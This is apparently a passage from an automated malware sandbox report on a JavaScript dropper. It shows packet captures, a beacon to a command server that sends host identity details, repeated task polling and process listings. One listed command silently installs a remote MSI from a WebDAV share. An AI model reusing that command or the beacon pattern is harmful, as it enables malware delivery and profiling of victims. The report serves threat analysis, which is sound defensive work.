                                                                  Apr 17, 2024 16:51:40.036565065 CEST1289INData Raw: 20 70 72 69 76 61 74 65 20 75 73 65 2e 54 68 65 20 6e 75 6d 65 72 69 63 20 63 75 73 74 6f 6d 20 61 63 74 69 6f 6e 20 74 79 70 65 2c 20 63 6f 6e 73 69 73 74 69 6e 67 20 6f 66 20 73 6f 75 72 63 65 20 6c 6f 63 61 74 69 6f 6e 2c 20 63 6f 64 65 20 74
                                                                  Data Ascii: private use.The numeric custom action type, consisting of source location, code type, entry, option flags.SourceCustomSourceThe table reference of the source of the code.TargetExcecution parameter, depends on the type of custom actionExtended
                                                                  Apr 17, 2024 16:51:40.213232994 CEST1289INData Raw: 61 75 6c 74 20 70 61 72 65 6e 74 20 64 69 72 65 63 74 6f 72 79 2e 20 41 20 72 65 63 6f 72 64 20 70 61 72 65 6e 74 65 64 20 74 6f 20 69 74 73 65 6c 66 20 6f 72 20 77 69 74 68 20 61 20 4e 75 6c 6c 20 70 61 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74
                                                                  Data Ascii: ault parent directory. A record parented to itself or with a Null parent represents a root of the install tree.DefaultDirThe default sub-path under parent's path.Integer error number, obtained from header file IError(...) macros.A foreign key


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  10192.168.2.64972387.249.49.20680
                                                                  TimestampBytes transferredDirectionData
                                                                  Apr 17, 2024 16:51:42.098539114 CEST162OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 73 68 61 72 65 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e
                                                                  Data Ascii: PROPFIND /share HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: krd6.com
                                                                  Apr 17, 2024 16:51:42.457077980 CEST1088INHTTP/1.1 207 Multi-Status
                                                                  Content-Type: application/xml; charset=utf-8
                                                                  Date: Wed, 17 Apr 2024 14:51:42 GMT
                                                                  Content-Length: 883
                                                                  Connection: close
                                                                  Server: WsgiDAV/4.3.0 Cheroot/10.0.0 Python/3.10.12
                                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 0a 3c 6e 73 30 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 6e 73 30 3d 22 44 41 56 3a 22 3e 3c 6e 73 30 3a 72 65 73 70 6f 6e 73 65 3e 3c 6e 73 30 3a 68 72 65 66 3e 2f 73 68 61 72 65 2f 3c 2f 6e 73 30 3a 68 72 65 66 3e 3c 6e 73 30 3a 70 72 6f 70 73 74 61 74 3e 3c 6e 73 30 3a 70 72 6f 70 3e 3c 6e 73 30 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 6e 73 30 3a 63 6f 6c 6c 65 63 74 69 6f 6e 20 2f 3e 3c 2f 6e 73 30 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 6e 73 30 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 32 30 32 34 2d 30 34 2d 31 36 54 31 36 3a 33 35 3a 35 38 5a 3c 2f 6e 73 30 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 3c 6e 73 30 3a 71 75 6f 74 61 2d 75 73 65 64 2d 62 79 74 65 73 3e 34 36 36 31 39 31 35 36 34 38 3c 2f 6e 73 30 3a 71 75 6f 74 61 2d 75 73 65 64 2d 62 79 74 65 73 3e 3c 6e 73 30 3a 71 75 6f 74 61 2d 61 76 61 69 6c 61 62 6c 65 2d 62 79 74 65 73 3e 32 30 33 31 39 33 36 37 31 36 38 3c 2f 6e 73 30 3a 71 75 6f 74 61 2d 61 76 61 69 6c 61 62 6c 65 2d 62 79 74 65 73 3e 3c 6e 73 30 3a 67 65 74 6c 61 73 74 6d 6f 64 69 66 69 65 64 3e 54 75 65 2c 20 31 36 20 41 70 72 20 32 30 32 34 20 31 36 3a 33 35 3a 35 38 20 47 4d 54 3c 2f 6e 73 30 3a 67 65 74 6c 61 73 74 6d 6f 64 69 66 69 65 64 3e 3c 6e 73 30 3a 64 69 73 70 6c 61 79 6e 61 6d 65 3e 73 68 61 72 65 3c 2f 6e 73 30 3a 64 69 73 70 6c 61 79 6e 61 6d 65 3e 3c 6e 73 30 3a 6c 6f 63 6b 64 69 73 63 6f 76 65 72 79 20 2f 3e 3c 6e 73 30 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 6e 73 30 3a 6c 6f 63 6b 65 6e 74 72 79 3e 3c 6e 73 30 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 6e 73 30 3a 65 78 63 6c 75 73 69 76 65 20 2f 3e 3c 2f 6e 73 30 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 6e 73 30 3a 6c 6f 63 6b 74 79 70 65 3e 3c 6e 73 30 3a 77 72 69 74 65 20 2f 3e 3c 2f 6e 73 30 3a 6c 6f 63 6b 74 79 70 65 3e 3c 2f 6e 73 30 3a 6c 6f 63 6b 65 6e 74 72 79 3e 3c 6e 73 30 3a 6c 6f 63 6b 65 6e 74 72 79 3e 3c 6e 73 30 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 6e 73 30 3a 73 68 61 72 65 64 20 2f 3e 3c 2f 6e 73 30 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 6e 73 30 3a 6c 6f 63 6b 74 79 70 65 3e 3c 6e 73 30 3a 77 72 69 74 65 20 2f 3e 3c 2f 6e 73 30 3a 6c 6f 63 6b 74 79 70 65 3e 3c 2f 6e 73 30 3a 6c 6f 63 6b 65 6e 74 72 79 3e 3c 2f 6e 73 30 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 2f 6e 73 30 3a 70 72 6f 70 3e 3c 6e 73 30 3a 73 74 61 74 75 73 3e 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 3c 2f 6e 73 30 3a 73 74 61 74 75 73 3e 3c 2f 6e 73 30 3a 70 72 6f 70 73 74 61 74 3e 3c 2f 6e 73 30 3a 72 65 73 70 6f 6e 73 65 3e 3c 2f 6e 73 30 3a 6d 75 6c 74 69 73 74 61 74 75 73 3e
                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8" ?><ns0:multistatus xmlns:ns0="DAV:"><ns0:response><ns0:href>/share/</ns0:href><ns0:propstat><ns0:prop><ns0:resourcetype><ns0:collection /></ns0:resourcetype><ns0:creationdate>2024-04-16T16:35:58Z</ns0:creationdate><ns0:quota-used-bytes>4661915648</ns0:quota-used-bytes><ns0:quota-available-bytes>20319367168</ns0:quota-available-bytes><ns0:getlastmodified>Tue, 16 Apr 2024 16:35:58 GMT</ns0:getlastmodified><ns0:displayname>share</ns0:displayname><ns0:lockdiscovery /><ns0:supportedlock><ns0:lockentry><ns0:lockscope><ns0:exclusive /></ns0:lockscope><ns0:locktype><ns0:write /></ns0:locktype></ns0:lockentry><ns0:lockentry><ns0:lockscope><ns0:shared /></ns0:lockscope><ns0:locktype><ns0:write /></ns0:locktype></ns0:lockentry></ns0:supportedlock></ns0:prop><ns0:status>HTTP/1.1 200 OK</ns0:status></ns0:propstat></ns0:response></ns0:multistatus>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  11192.168.2.64972487.249.49.20680
                                                                  TimestampBytes transferredDirectionData
                                                                  Apr 17, 2024 16:51:42.708201885 CEST162OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 73 68 61 72 65 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e
                                                                  Data Ascii: PROPFIND /share HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: krd6.com
                                                                  Apr 17, 2024 16:51:43.065470934 CEST1088INHTTP/1.1 207 Multi-Status
                                                                  Content-Type: application/xml; charset=utf-8
                                                                  Date: Wed, 17 Apr 2024 14:51:42 GMT
                                                                  Content-Length: 883
                                                                  Connection: close
                                                                  Server: WsgiDAV/4.3.0 Cheroot/10.0.0 Python/3.10.12
                                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 0a 3c 6e 73 30 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 6e 73 30 3d 22 44 41 56 3a 22 3e 3c 6e 73 30 3a 72 65 73 70 6f 6e 73 65 3e 3c 6e 73 30 3a 68 72 65 66 3e 2f 73 68 61 72 65 2f 3c 2f 6e 73 30 3a 68 72 65 66 3e 3c 6e 73 30 3a 70 72 6f 70 73 74 61 74 3e 3c 6e 73 30 3a 70 72 6f 70 3e 3c 6e 73 30 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 6e 73 30 3a 63 6f 6c 6c 65 63 74 69 6f 6e 20 2f 3e 3c 2f 6e 73 30 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 6e 73 30 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 32 30 32 34 2d 30 34 2d 31 36 54 31 36 3a 33 35 3a 35 38 5a 3c 2f 6e 73 30 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 3c 6e 73 30 3a 71 75 6f 74 61 2d 75 73 65 64 2d 62 79 74 65 73 3e 34 36 36 31 39 31 35 36 34 38 3c 2f 6e 73 30 3a 71 75 6f 74 61 2d 75 73 65 64 2d 62 79 74 65 73 3e 3c 6e 73 30 3a 71 75 6f 74 61 2d 61 76 61 69 6c 61 62 6c 65 2d 62 79 74 65 73 3e 32 30 33 31 39 33 36 37 31 36 38 3c 2f 6e 73 30 3a 71 75 6f 74 61 2d 61 76 61 69 6c 61 62 6c 65 2d 62 79 74 65 73 3e 3c 6e 73 30 3a 67 65 74 6c 61 73 74 6d 6f 64 69 66 69 65 64 3e 54 75 65 2c 20 31 36 20 41 70 72 20 32 30 32 34 20 31 36 3a 33 35 3a 35 38 20 47 4d 54 3c 2f 6e 73 30 3a 67 65 74 6c 61 73 74 6d 6f 64 69 66 69 65 64 3e 3c 6e 73 30 3a 64 69 73 70 6c 61 79 6e 61 6d 65 3e 73 68 61 72 65 3c 2f 6e 73 30 3a 64 69 73 70 6c 61 79 6e 61 6d 65 3e 3c 6e 73 30 3a 6c 6f 63 6b 64 69 73 63 6f 76 65 72 79 20 2f 3e 3c 6e 73 30 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 6e 73 30 3a 6c 6f 63 6b 65 6e 74 72 79 3e 3c 6e 73 30 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 6e 73 30 3a 65 78 63 6c 75 73 69 76 65 20 2f 3e 3c 2f 6e 73 30 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 6e 73 30 3a 6c 6f 63 6b 74 79 70 65 3e 3c 6e 73 30 3a 77 72 69 74 65 20 2f 3e 3c 2f 6e 73 30 3a 6c 6f 63 6b 74 79 70 65 3e 3c 2f 6e 73 30 3a 6c 6f 63 6b 65 6e 74 72 79 3e 3c 6e 73 30 3a 6c 6f 63 6b 65 6e 74 72 79 3e 3c 6e 73 30 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 6e 73 30 3a 73 68 61 72 65 64 20 2f 3e 3c 2f 6e 73 30 3a 6c 6f 63 6b 73 63 6f 70 65 3e 3c 6e 73 30 3a 6c 6f 63 6b 74 79 70 65 3e 3c 6e 73 30 3a 77 72 69 74 65 20 2f 3e 3c 2f 6e 73 30 3a 6c 6f 63 6b 74 79 70 65 3e 3c 2f 6e 73 30 3a 6c 6f 63 6b 65 6e 74 72 79 3e 3c 2f 6e 73 30 3a 73 75 70 70 6f 72 74 65 64 6c 6f 63 6b 3e 3c 2f 6e 73 30 3a 70 72 6f 70 3e 3c 6e 73 30 3a 73 74 61 74 75 73 3e 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 3c 2f 6e 73 30 3a 73 74 61 74 75 73 3e 3c 2f 6e 73 30 3a 70 72 6f 70 73 74 61 74 3e 3c 2f 6e 73 30 3a 72 65 73 70 6f 6e 73 65 3e 3c 2f 6e 73 30 3a 6d 75 6c 74 69 73 74 61 74 75 73 3e
                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8" ?><ns0:multistatus xmlns:ns0="DAV:"><ns0:response><ns0:href>/share/</ns0:href><ns0:propstat><ns0:prop><ns0:resourcetype><ns0:collection /></ns0:resourcetype><ns0:creationdate>2024-04-16T16:35:58Z</ns0:creationdate><ns0:quota-used-bytes>4661915648</ns0:quota-used-bytes><ns0:quota-available-bytes>20319367168</ns0:quota-available-bytes><ns0:getlastmodified>Tue, 16 Apr 2024 16:35:58 GMT</ns0:getlastmodified><ns0:displayname>share</ns0:displayname><ns0:lockdiscovery /><ns0:supportedlock><ns0:lockentry><ns0:lockscope><ns0:exclusive /></ns0:lockscope><ns0:locktype><ns0:write /></ns0:locktype></ns0:lockentry><ns0:lockentry><ns0:lockscope><ns0:shared /></ns0:lockscope><ns0:locktype><ns0:write /></ns0:locktype></ns0:lockentry></ns0:supportedlock></ns0:prop><ns0:status>HTTP/1.1 200 OK</ns0:status></ns0:propstat></ns0:response></ns0:multistatus>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  12192.168.2.64973385.239.53.219804992C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Apr 17, 2024 16:51:58.183089972 CEST267OUTPOST /api/gateway HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: application/json
                                                                  Referer: */*
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                  Content-Length: 163
                                                                  Host: 85.239.53.219
                                                                  Apr 17, 2024 16:51:58.183113098 CEST163OUTData Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 22 76 31 2e 34 2e 30 22 2c 22 69 70 22 3a 22 38 31 2e 31 38 31 2e 35 37 2e 35 32 22 2c 22 64 6f 6d 61 69 6e 22 3a 22 45 4e 47 49 4e 45 45 52 2d 50 43 22 2c 22 68 6f 73 74 6e 61 6d 65 22 3a 22 38 38 38 36 38 33 22
                                                                  Data Ascii: {"version":"v1.4.0","ip":"81.181.57.52","domain":"user-PC","hostname":"888683","arch":"x86","os_version":"Windows 6.3.9600","cur_user":"User","owner":"Nevada"}
                                                                  Apr 17, 2024 16:51:58.377193928 CEST266INHTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Wed, 17 Apr 2024 14:51:58 GMT
                                                                  Content-Type: application/json; charset=utf-8
                                                                  Content-Length: 74
                                                                  Connection: keep-alive
                                                                  Referrer-Policy: no-referrer
                                                                  Data Raw: 7b 22 6b 65 79 22 3a 20 22 57 6b 5a 50 78 42 6f 48 36 43 41 33 4f 6b 34 69 49 22 2c 20 22 69 64 22 3a 20 22 64 65 37 32 66 62 36 33 2d 38 33 63 34 2d 39 65 63 31 2d 66 31 30 39 2d 37 36 61 37 32 61 63 64 35 32 38 39 22 7d
                                                                  Data Ascii: {"key": "WkZPxBoH6CA3Ok4iI", "id": "de72fb63-83c4-9ec1-f109-76a72acd5289"}
                                                                  Apr 17, 2024 16:51:58.379358053 CEST300OUTPOST /api/de72fb63-83c4-9ec1-f109-76a72acd5289/tasks HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: application/json
                                                                  Referer: */*
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                  Content-Length: 0
                                                                  Host: 85.239.53.219
                                                                  Apr 17, 2024 16:51:58.559297085 CEST185INHTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Wed, 17 Apr 2024 14:51:58 GMT
                                                                  Content-Type: text/plain; charset=utf-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive
                                                                  Referrer-Policy: no-referrer
                                                                  Apr 17, 2024 16:52:18.562695026 CEST300OUTPOST /api/de72fb63-83c4-9ec1-f109-76a72acd5289/tasks HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: application/json
                                                                  Referer: */*
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                  Content-Length: 0
                                                                  Host: 85.239.53.219
                                                                  Apr 17, 2024 16:52:18.741005898 CEST185INHTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Wed, 17 Apr 2024 14:52:18 GMT
                                                                  Content-Type: text/plain; charset=utf-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive
                                                                  Referrer-Policy: no-referrer
                                                                  Apr 17, 2024 16:52:38.772017956 CEST300OUTPOST /api/de72fb63-83c4-9ec1-f109-76a72acd5289/tasks HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: application/json
                                                                  Referer: */*
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                  Content-Length: 0
                                                                  Host: 85.239.53.219
                                                                  Apr 17, 2024 16:52:38.950999975 CEST185INHTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Wed, 17 Apr 2024 14:52:38 GMT
                                                                  Content-Type: text/plain; charset=utf-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive
                                                                  Referrer-Policy: no-referrer
                                                                  Apr 17, 2024 16:52:58.954709053 CEST300OUTPOST /api/de72fb63-83c4-9ec1-f109-76a72acd5289/tasks HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: application/json
                                                                  Referer: */*
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                  Content-Length: 0
                                                                  Host: 85.239.53.219
                                                                  Apr 17, 2024 16:52:59.134916067 CEST185INHTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Wed, 17 Apr 2024 14:52:59 GMT
                                                                  Content-Type: text/plain; charset=utf-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive
                                                                  Referrer-Policy: no-referrer
                                                                  Apr 17, 2024 16:53:19.138189077 CEST300OUTPOST /api/de72fb63-83c4-9ec1-f109-76a72acd5289/tasks HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Content-Type: application/json
                                                                  Referer: */*
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                  Content-Length: 0
                                                                  Host: 85.239.53.219
                                                                  Apr 17, 2024 16:53:19.317894936 CEST185INHTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Wed, 17 Apr 2024 14:53:19 GMT
                                                                  Content-Type: text/plain; charset=utf-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive
                                                                  Referrer-Policy: no-referrer


                                                                  HTTPS Proxied Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.649726104.26.13.2054434992C:\Windows\SysWOW64\msiexec.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-04-17 14:51:46 UTC188OUTGET / HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                                  Host: api.ipify.org
                                                                  2024-04-17 14:51:46 UTC211INHTTP/1.1 200 OK
                                                                  Date: Wed, 17 Apr 2024 14:51:46 GMT
                                                                  Content-Type: text/plain
                                                                  Content-Length: 12
                                                                  Connection: close
                                                                  Vary: Origin
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Server: cloudflare
                                                                  CF-RAY: 875d3c31fbaa451a-ATL
                                                                  2024-04-17 14:51:46 UTC12INData Raw: 38 31 2e 31 38 31 2e 35 37 2e 35 32
                                                                  Data Ascii: 81.181.57.52


                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:16:51:28
                                                                  Start date:17/04/2024
                                                                  Path:C:\Windows\System32\wscript.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Doc_m42_81h118103-88o62135w8623-1999q9.js"
                                                                  Imagebase:0x7ff724850000
                                                                  File size:170'496 bytes
                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:7
                                                                  Start time:16:51:37
                                                                  Start date:17/04/2024
                                                                  Path:C:\Windows\System32\msiexec.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:msiexec.exe /i \\krd6.com@80\share\avp.msi /qn
                                                                  Imagebase:0x7ff64d6a0000
                                                                  File size:69'632 bytes
                                                                  MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:8
                                                                  Start time:16:51:41
                                                                  Start date:17/04/2024
                                                                  Path:C:\Windows\System32\msiexec.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\msiexec.exe /V
                                                                  Imagebase:0x7ff64d6a0000
                                                                  File size:69'632 bytes
                                                                  MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:9
                                                                  Start time:16:51:43
                                                                  Start date:17/04/2024
                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 52F9060B0A3925FB79F0CEC8B387C410
                                                                  Imagebase:0x1a0000
                                                                  File size:59'904 bytes
                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Disassembly

                                                                  No disassembly